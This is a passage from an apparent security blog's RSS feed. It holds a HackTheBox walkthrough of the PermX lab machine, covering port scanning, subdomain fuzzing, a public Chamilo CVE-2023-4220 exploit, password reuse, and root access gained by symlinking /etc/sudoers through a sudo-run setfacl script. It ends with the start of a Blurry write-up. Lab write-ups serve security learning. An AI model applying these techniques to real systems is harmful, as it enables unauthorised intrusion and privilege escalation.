&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>Nmap scan report &lt;span style="color:#fe8019">for&lt;/span> permx.htb &lt;span style="color:#fe8019">(&lt;/span>10.10.11.23&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Host is up, received syn-ack &lt;span style="color:#fe8019">(&lt;/span>0.25s latency&lt;span style="color:#fe8019">)&lt;/span>.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Scanned at 2024-07-08 15:04:06 IST &lt;span style="color:#fe8019">for&lt;/span> 97s
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Not shown: &lt;span style="color:#d3869b">63855&lt;/span> filtered ports, &lt;span style="color:#d3869b">1678&lt;/span> closed ports
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Reason: &lt;span style="color:#d3869b">63855&lt;/span> no-responses and &lt;span style="color:#d3869b">1678&lt;/span> conn-refused
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>PORT STATE SERVICE REASON
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>22/tcp open ssh syn-ack
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>80/tcp open http syn-ack
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Enumerated open TCP ports:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>nmap -p22,80 --min-rate &lt;span style="color:#d3869b">1000&lt;/span> -sC -sV -vv -oA nmap/services 10.10.11.23
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>Nmap scan report &lt;span style="color:#fe8019">for&lt;/span> permx.htb &lt;span style="color:#fe8019">(&lt;/span>10.10.11.23&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Host is up, received syn-ack &lt;span style="color:#fe8019">(&lt;/span>0.16s latency&lt;span style="color:#fe8019">)&lt;/span>.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Scanned at 2024-07-08 15:05:58 IST &lt;span style="color:#fe8019">for&lt;/span> 12s
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>PORT STATE SERVICE REASON VERSION
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>22/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 &lt;span style="color:#fe8019">(&lt;/span>Ubuntu Linux; protocol 2.0&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>80/tcp open http syn-ack Apache httpd 2.4.52
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| http-methods:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_ Supported Methods: OPTIONS HEAD GET POST
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_http-server-header: Apache/2.4.52 &lt;span style="color:#fe8019">(&lt;/span>Ubuntu&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_http-title: eLEARNING
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>There are only 2 ports open, &lt;code>80&lt;/code> and &lt;code>22&lt;/code>&lt;/p>
&lt;hr>
&lt;h1 id="enumeration">Enumeration&lt;/h1>
&lt;h2 id="port-80---http-apache">Port 80 - HTTP (Apache)&lt;/h2>
&lt;img src="https://h4r1337.github.io/img/permx/Pasted%20image%2020240708150113.webp" alt="">&lt;p>There isn&amp;rsquo;t much functionality to test in this site. There&amp;rsquo;s a contact form
in &lt;code>/contact.html&lt;/code>, but that is also not working.
Let&amp;rsquo;s do vhost enumeration to check if there&amp;rsquo;s any subdomains:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>ffuf -u http://permx.htb/ -H &lt;span style="color:#b8bb26">&amp;#39;Host: FUZZ.permx.htb&amp;#39;&lt;/span> -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -mc &lt;span style="color:#d3869b">200&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> /&lt;span style="color:#b8bb26">&amp;#39;___\ /&amp;#39;&lt;/span>___&lt;span style="color:#b8bb26">\ &lt;/span> /&amp;#39;___&lt;span style="color:#b8bb26">\
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">&lt;/span> /&lt;span style="color:#b8bb26">\ \_&lt;/span>_/ /&lt;span style="color:#b8bb26">\ \_&lt;/span>_/ __ __ /&lt;span style="color:#b8bb26">\ \_&lt;/span>_/
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">\ \ &lt;/span>,__&lt;span style="color:#b8bb26">\\&lt;/span> &lt;span style="color:#b8bb26">\ &lt;/span>,__&lt;span style="color:#b8bb26">\/\ \/\ \ \ \ &lt;/span>,__&lt;span style="color:#b8bb26">\
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">&lt;/span> &lt;span style="color:#b8bb26">\ \ \_&lt;/span>/ &lt;span style="color:#b8bb26">\ \ \_&lt;/span>/&lt;span style="color:#b8bb26">\ \ \_\ \ \ \ \_&lt;/span>/
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">\ \_\ &lt;/span> &lt;span style="color:#b8bb26">\ \_\ &lt;/span> &lt;span style="color:#b8bb26">\ \_&lt;/span>___/ &lt;span style="color:#b8bb26">\ \_\
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">&lt;/span> &lt;span style="color:#b8bb26">\/&lt;/span>_/ &lt;span style="color:#b8bb26">\/&lt;/span>_/ &lt;span style="color:#b8bb26">\/&lt;/span>___/ &lt;span style="color:#b8bb26">\/&lt;/span>_/
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> v1.1.0
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>________________________________________________
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> :: Method : GET
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> :: URL : http://permx.htb/
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> :: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> :: Header : Host: FUZZ.permx.htb
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> :: Follow redirects : &lt;span style="color:#fabd2f">false&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> :: Calibration : &lt;span style="color:#fabd2f">false&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> :: Timeout : &lt;span style="color:#d3869b">10&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> :: Threads : &lt;span style="color:#d3869b">40&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> :: Matcher : Response status: &lt;span style="color:#d3869b">200&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>________________________________________________
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>www &lt;span style="color:#fe8019">[&lt;/span>Status: 200, Size: 36178, Words: 12829, Lines: 587&lt;span style="color:#fe8019">]&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>lms &lt;span style="color:#fe8019">[&lt;/span>Status: 200, Size: 19347, Words: 4910, Lines: 353&lt;span style="color:#fe8019">]&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>:: Progress: &lt;span style="color:#fe8019">[&lt;/span>4989/4989&lt;span style="color:#fe8019">]&lt;/span> :: Job &lt;span style="color:#fe8019">[&lt;/span>1/1&lt;span style="color:#fe8019">]&lt;/span> :: &lt;span style="color:#d3869b">226&lt;/span> req/sec :: Duration: &lt;span style="color:#fe8019">[&lt;/span>0:00:22&lt;span style="color:#fe8019">]&lt;/span> :: Errors: &lt;span style="color:#d3869b">0&lt;/span> ::
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Found one subdomain, let&amp;rsquo;s add that to &lt;code>/etc/hosts&lt;/code> as well&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fabd2f">echo&lt;/span> -e &lt;span style="color:#b8bb26">&amp;#39;10.10.11.23\tlms.permx.htb&amp;#39;&lt;/span> | sudo tee -a /etc/hosts
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;h4 id="lmspermxhtb">&lt;code>lms.permx.htb&lt;/code>&lt;/h4>
&lt;img src="https://h4r1337.github.io/img/permx/Pasted%20image%2020240708151036.webp" alt="">&lt;p>Chamilo is an open source e-learning and content management system.
If we also have the version number, we could easily find a working exploit.
The &lt;code>/robots.txt&lt;/code> file is available and there&amp;rsquo;s some files that might disclose the version number.
&lt;img src="https://h4r1337.github.io/img/permx/robots-txt.webp" alt="">&lt;/p>
&lt;p>The &lt;code>README.txt&lt;/code> file returns a 404 error. But the &lt;code>/documentation/&lt;/code> endpoint is working fine and we can see the version of the chamilo instance used here.
&lt;img src="https://h4r1337.github.io/img/permx/version.webp" alt="">
Chamilo LMS &amp;lt;= &lt;code>1.11.24&lt;/code> is vulnerable to unauthenticated RCE throught file upload - &lt;a href="https://pentest-tools.com/vulnerabilities-exploits/chamilo-lms-11124-remote-code-execution_22949">CVE-2023-4220&lt;/a>.&lt;/p>
&lt;h1 id="exploitation---cve-2023-4220">Exploitation - &lt;code>CVE-2023-4220&lt;/code>&lt;/h1>
&lt;p>Found this &lt;a href="https://github.com/Ziad-Sakr/Chamilo-LMS-CVE-2023-4220-Exploit/blob/main/CVE-2023-4220.sh?source=post_page-----84871140b508--------------------------------">exploit&lt;/a> to be working. Let&amp;rsquo;s run it:&lt;/p>
&lt;img src="https://h4r1337.github.io/img/permx/Pasted%20image%2020240709202401.webp" alt="">&lt;p>And we got the shell.&lt;/p>
&lt;h1 id="lateral-movement-to-user">Lateral Movement to user&lt;/h1>
&lt;h2 id="local-enumeration">Local Enumeration&lt;/h2>
&lt;p>We can start by enumerating the configuration files of chamilo.
After some enumeration in the &lt;code>/var/www/chamilo&lt;/code> directory for password in the configuration files I found this:&lt;/p>
&lt;img src="https://h4r1337.github.io/img/permx/Pasted%20image%2020240709203439.webp" alt="">&lt;p>There are only 2 users in the machine.&lt;/p>
&lt;img src="https://h4r1337.github.io/img/permx/users.webp" alt="">&lt;p>We can try the password with user &lt;code>mtz&lt;/code>&lt;/p>
&lt;p>And it works:&lt;/p>
&lt;img src="https://h4r1337.github.io/img/permx/Pasted%20image%2020240709203701.webp" alt="">&lt;hr>
&lt;h1 id="privilege-escalation">Privilege Escalation&lt;/h1>
&lt;h2 id="local-enumeration-1">Local Enumeration&lt;/h2>
&lt;img src="https://h4r1337.github.io/img/permx/Pasted%20image%2020240709205357.webp" alt="">&lt;p>It looks like we can execute &lt;code>/opt/acl.sh&lt;/code> with sudo privileges.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>cat /opt/acl.sh
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#8ec07c">#!/bin/bash
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#8ec07c">&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">if&lt;/span> &lt;span style="color:#fe8019">[&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$#&lt;span style="color:#b8bb26">&amp;#34;&lt;/span> -ne &lt;span style="color:#d3869b">3&lt;/span> &lt;span style="color:#fe8019">]&lt;/span>; &lt;span style="color:#fe8019">then&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> /usr/bin/echo &lt;span style="color:#b8bb26">&amp;#34;Usage: &lt;/span>$0&lt;span style="color:#b8bb26"> user perm file&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">exit&lt;/span> &lt;span style="color:#d3869b">1&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">fi&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>user&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$1&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>perm&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$2&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>target&lt;span style="color:#fe8019">=&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$3&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">if&lt;/span> &lt;span style="color:#fe8019">[[&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$target&lt;span style="color:#b8bb26">&amp;#34;&lt;/span> !&lt;span style="color:#fe8019">=&lt;/span> /home/mtz/* &lt;span style="color:#fe8019">||&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$target&lt;span style="color:#b8bb26">&amp;#34;&lt;/span> &lt;span style="color:#fe8019">==&lt;/span> *..* &lt;span style="color:#fe8019">]]&lt;/span>; &lt;span style="color:#fe8019">then&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> /usr/bin/echo &lt;span style="color:#b8bb26">&amp;#34;Access denied.&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">exit&lt;/span> &lt;span style="color:#d3869b">1&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">fi&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># Check if the path is a file&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">if&lt;/span> &lt;span style="color:#fe8019">[&lt;/span> ! -f &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$target&lt;span style="color:#b8bb26">&amp;#34;&lt;/span> &lt;span style="color:#fe8019">]&lt;/span>; &lt;span style="color:#fe8019">then&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> /usr/bin/echo &lt;span style="color:#b8bb26">&amp;#34;Target must be a file.&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fabd2f">exit&lt;/span> &lt;span style="color:#d3869b">1&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">fi&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>/usr/bin/sudo /usr/bin/setfacl -m u:&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$user&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>:&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$perm&lt;span style="color:#b8bb26">&amp;#34;&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;&lt;/span>$target&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>The script runs the &lt;code>setfacl&lt;/code> command as sudo and gives the user control to specify three arguments that is then passed to &lt;code>setfacl&lt;/code>.&lt;/p>
&lt;div
class="alert alert-note open"
style="border-color: #076678;"
>
&lt;div
class="alert-heading-box"
onclick="toggleAlert(this)"
>
&lt;i
class="bx bx-info-circle"
style="color: #076678;"
>&lt;/i>
&lt;p
class="alert-heading"
style="color: #076678"
>
Note
&lt;/p>
&lt;i
class='bx bx-chevron-down open'
style="color: #076678;"
>&lt;/i>
&lt;/div>
&lt;div class="alert-content" >
&lt;p>&lt;a href="https://www.usenix.org/legacy/publications/library/proceedings/usenix03/tech/freenix03/full_papers/gruenbacher/gruenbacher_html/main.html">&lt;code>setfacl&lt;/code>&lt;/a> is a command utility tool for setting access control lists in files and directories.&lt;/p>
&lt;/div>
&lt;/div>
&lt;script>
function toggleAlert(headerElement) {
var alertBox = headerElement.parentElement;
var alertContent = alertBox.querySelector('.alert-content');
var icon = headerElement.querySelectorAll('i')[1];
alertBox.classList.toggle('open');
alertBox.classList.toggle('collapsed');
if (alertBox.classList.contains('open')) {
alertContent.style.display = 'block';
icon.classList.remove('open');
icon.classList.add('collapsed');
} else {
icon.classList.remove('collapsed');
icon.classList.add('open');
alertContent.style.display = 'none';
}
}
&lt;/script>
&lt;p>In a closer look, we can see that, &lt;code>acl.sh&lt;/code> requires 3 inputs &lt;code>$user&lt;/code> &lt;code>$perm&lt;/code> and &lt;code>$target&lt;/code>.&lt;/p>
&lt;ul>
&lt;li>&lt;code>$user&lt;/code> is the user for which we want to set the permission. In our case user &lt;code>mtz&lt;/code>.&lt;/li>
&lt;li>&lt;code>$perm&lt;/code> represents the permission. eg: &lt;code>rwx&lt;/code> for read, write, and execute permissions.&lt;/li>
&lt;li>&lt;code>$target&lt;/code> is to specify the file we want to upply the permission.
The script also check if the &lt;code>$target&lt;/code> is located in &lt;code>/home/mtz/&lt;/code> directory, that is our home directory. And eventhough there is a wildcard (&lt;code>*&lt;/code>) used to check this,
we can&amp;rsquo;t use file path like &lt;code>/home/mtz/../../root/root.txt&lt;/code> because the script also checks if the &lt;code>$target&lt;/code> contains &lt;code>..&lt;/code> characters.&lt;/li>
&lt;/ul>
&lt;p>But what we can try is to create a symlink of a file in our home directory and change its permission.&lt;/p>
&lt;h2 id="privilege-escalation-1">Privilege Escalation&lt;/h2>
&lt;p>So with that set, we can try changing permission of the &lt;code>/etc/sudoers&lt;/code> file:
&lt;img src="https://h4r1337.github.io/img/permx/Pasted%20image%2020240709210026.webp" alt="">&lt;/p>
&lt;p>First, let&amp;rsquo;s create a symlink in our home directory.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>ln -s /etc/sudoers /home/mtz/test
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;img src="https://h4r1337.github.io/img/permx/Pasted%20image%2020240709210138.webp" alt="">&lt;img src="https://h4r1337.github.io/img/permx/Pasted%20image%2020240709210214.webp" alt="">&lt;p>Now let&amp;rsquo;s edit the file and update the permission of user &lt;code>mtz&lt;/code>:&lt;/p>
&lt;img src="https://h4r1337.github.io/img/permx/Pasted%20image%2020240709210254.webp" alt="">&lt;p>And that&amp;rsquo;s it:&lt;/p>
&lt;img src="https://h4r1337.github.io/img/permx/Pasted%20image%2020240709210530.webp" alt="">&lt;h3 id="references">References:&lt;/h3>
&lt;ul>
&lt;li>&lt;a href="https://pentest-tools.com/vulnerabilities-exploits/chamilo-lms-11124-remote-code-execution_22949">CVE-2023-4220&lt;/a>&lt;/li>
&lt;li>&lt;a href="https://github.com/Ziad-Sakr/Chamilo-LMS-CVE-2023-4220-Exploit/blob/main/CVE-2023-4220.sh">CVE-2023-4220 Exploit&lt;/a>&lt;/li>
&lt;li>&lt;a href="https://www.usenix.org/legacy/publications/library/proceedings/usenix03/tech/freenix03/full_papers/gruenbacher/gruenbacher_html/main.html">POSIX Access Control Lists on Linux&lt;/a>&lt;/li>
&lt;/ul></content></item><item><title>Blurry | HackTheBox</title><link>https://h4r1337.github.io/posts/blurry/</link><pubDate>Sun, 13 Oct 2024 18:13:48 +0530</pubDate><guid>https://h4r1337.github.io/posts/blurry/</guid><description>&lt;h2 id="overview">Overview&lt;/h2>
&lt;img src="https://h4r1337.github.io/img/blurry/cover.webp" alt="">&lt;table>
&lt;thead>
&lt;tr>
&lt;th style="text-align: center">Title&lt;/th>
&lt;th style="text-align: center">&lt;a href="https://app.hackthebox.com/machines/Blurry">Blurry&lt;/a>&lt;/th>
&lt;/tr>
&lt;/thead>
&lt;tbody>
&lt;tr>
&lt;td style="text-align: center">Difficulty&lt;/td>
&lt;td style="text-align: center">Medium&lt;/td>
&lt;/tr>
&lt;tr>
&lt;td style="text-align: center">Machine&lt;/td>
&lt;td style="text-align: center">Linux&lt;/td>
&lt;/tr>
&lt;tr>
&lt;td style="text-align: center">Maker&lt;/td>
&lt;td style="text-align: center">&lt;a href="https://app.hackthebox.com/users/458049">&lt;img src="https://www.hackthebox.com/badge/image/458049" alt="" style="display: unset">&lt;/a>&lt;/td>
&lt;/tr>
&lt;/tbody>
&lt;/table>
&lt;br>
&lt;div
class="alert alert-tip collapsed"
style="border-color: #bdbb26;"
>
&lt;div
class="alert-heading-box"
onclick="toggleAlert(this)"
>
&lt;i
class="bx bx-bulb"
style="color: #bdbb26;"
>&lt;/i>
&lt;p
class="alert-heading"
style="color: #bdbb26"
>
About Blurry
&lt;/p>
&lt;i
class='bx bx-chevron-down collapsed'
style="color: #bdbb26;"
>&lt;/i>
&lt;/div>
&lt;div class="alert-content" style="display: none;">
&lt;p>Blurry is a medium-difficulty Linux machine that features DevOps-related vectors surrounding machine learning. The foothold is comprised of a series of CVEs recently disclosed about the ClearML suite. The service provides a web platform, a fileserver, and an API; all of which contain vulnerabilities (&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2024-24590">CVE-2024-24590&lt;/a> - &lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2024-24595">CVE-2024-24595&lt;/a>) that can be chained together for remote code execution. Once a shell on the target is obtained, a program that can be run with &lt;code>sudo&lt;/code> is discovered. The program loads arbitrary &lt;code>PyTorch&lt;/code> models to evaluate them against a protected dataset. While it is known that such models are susceptible to insecure deserialisation, &lt;code>fickling&lt;/code> is used to scan the dataset for insecure &lt;code>pickle&lt;/code> files , prior to loading the model. Malicious code can be injected into a model, using &lt;code>runpy&lt;/code> to bypass the &lt;code>fickling&lt;/code> checks.&lt;/p></description><content>&lt;h2 id="overview">Overview&lt;/h2>
&lt;img src="https://h4r1337.github.io/img/blurry/cover.webp" alt="">&lt;table>
&lt;thead>
&lt;tr>
&lt;th style="text-align: center">Title&lt;/th>
&lt;th style="text-align: center">&lt;a href="https://app.hackthebox.com/machines/Blurry">Blurry&lt;/a>&lt;/th>
&lt;/tr>
&lt;/thead>
&lt;tbody>
&lt;tr>
&lt;td style="text-align: center">Difficulty&lt;/td>
&lt;td style="text-align: center">Medium&lt;/td>
&lt;/tr>
&lt;tr>
&lt;td style="text-align: center">Machine&lt;/td>
&lt;td style="text-align: center">Linux&lt;/td>
&lt;/tr>
&lt;tr>
&lt;td style="text-align: center">Maker&lt;/td>
&lt;td style="text-align: center">&lt;a href="https://app.hackthebox.com/users/458049">&lt;img src="https://www.hackthebox.com/badge/image/458049" alt="" style="display: unset">&lt;/a>&lt;/td>
&lt;/tr>
&lt;/tbody>
&lt;/table>
&lt;br>
&lt;div
class="alert alert-tip collapsed"
style="border-color: #bdbb26;"
>
&lt;div
class="alert-heading-box"
onclick="toggleAlert(this)"
>
&lt;i
class="bx bx-bulb"
style="color: #bdbb26;"
>&lt;/i>
&lt;p
class="alert-heading"
style="color: #bdbb26"
>
About Blurry
&lt;/p>
&lt;i
class='bx bx-chevron-down collapsed'
style="color: #bdbb26;"
>&lt;/i>
&lt;/div>
&lt;div class="alert-content" style="display: none;">
&lt;p>Blurry is a medium-difficulty Linux machine that features DevOps-related vectors surrounding machine learning. The foothold is comprised of a series of CVEs recently disclosed about the ClearML suite. The service provides a web platform, a fileserver, and an API; all of which contain vulnerabilities (&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2024-24590">CVE-2024-24590&lt;/a> - &lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2024-24595">CVE-2024-24595&lt;/a>) that can be chained together for remote code execution. Once a shell on the target is obtained, a program that can be run with &lt;code>sudo&lt;/code> is discovered. The program loads arbitrary &lt;code>PyTorch&lt;/code> models to evaluate them against a protected dataset. While it is known that such models are susceptible to insecure deserialisation, &lt;code>fickling&lt;/code> is used to scan the dataset for insecure &lt;code>pickle&lt;/code> files , prior to loading the model. Malicious code can be injected into a model, using &lt;code>runpy&lt;/code> to bypass the &lt;code>fickling&lt;/code> checks.&lt;/p>
&lt;/div>
&lt;/div>
&lt;script>
function toggleAlert(headerElement) {
var alertBox = headerElement.parentElement;
var alertContent = alertBox.querySelector('.alert-content');
var icon = headerElement.querySelectorAll('i')[1];
alertBox.classList.toggle('open');
alertBox.classList.toggle('collapsed');
if (alertBox.classList.contains('open')) {
alertContent.style.display = 'block';
icon.classList.remove('open');
icon.classList.add('collapsed');
} else {
icon.classList.remove('collapsed');
icon.classList.add('open');
alertContent.style.display = 'none';
}
}
&lt;/script>
&lt;h1 id="information-gathering">Information Gathering&lt;/h1>
&lt;p>Scanned all TCP ports:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>nmap -p- -vv --min-rate &lt;span style="color:#d3869b">5000&lt;/span> 10.10.11.19 -oA nmap/ports
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>Nmap scan report &lt;span style="color:#fe8019">for&lt;/span> app.blurry.htb &lt;span style="color:#fe8019">(&lt;/span>10.10.11.19&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Host is up, received conn-refused &lt;span style="color:#fe8019">(&lt;/span>0.21s latency&lt;span style="color:#fe8019">)&lt;/span>.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Scanned at 2024-10-13 12:51:47 IST &lt;span style="color:#fe8019">for&lt;/span> 246s
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Not shown: &lt;span style="color:#d3869b">43506&lt;/span> filtered ports, &lt;span style="color:#d3869b">22027&lt;/span> closed ports
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Reason: &lt;span style="color:#d3869b">43506&lt;/span> no-responses and &lt;span style="color:#d3869b">22027&lt;/span> conn-refused
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>PORT STATE SERVICE REASON
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>22/tcp open ssh syn-ack
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>80/tcp open http syn-ack
